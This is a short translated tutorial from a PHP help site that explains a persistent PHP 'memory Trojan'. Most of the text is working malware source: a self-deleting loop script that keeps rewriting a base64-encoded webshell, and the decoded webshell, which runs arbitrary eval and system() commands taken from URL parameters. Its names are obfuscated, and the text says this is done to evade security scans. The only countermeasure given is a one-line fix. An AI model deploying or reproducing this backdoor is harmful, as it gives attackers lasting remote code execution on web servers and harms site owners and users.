Take you to analyze the implementation principle of PHP memory Trojan virus

Preface

Memory Trojan is a Trojan virus that runs in the memory and has no code entity. Memory Trojans are highly concealed, difficult to detect, and unkillable (commonly known as immortal horses).

The network security industry has a strong barrel effect. The system fights against black hats, and the outcome depends on the weakest link in security. Black hat versus white hat, the outcome depends on the level of attack and the level of concealment and destruction.

The main text does not discuss whether an arbitrary file upload or a near-source attack made a piece of malicious code accessible to the production server.

Virus source code (very simple)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}

Release the virus body

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}

Instructions

• The above key sensitive codes have been encoded to avoid various security scans.

• Once the virus sample is run, it will delete itself and run in the memory for a long time.

• Even if the released Trojan is detected and deleted, the same file will still be generated.

Solution

After killing the process, delete the released Trojan file.

Recommended: "PHP Video Tutorial"

The above is the detailed content of Take you to analyze the implementation principle of PHP memory Trojan virus. For more information, please follow other related articles on the PHP Chinese website!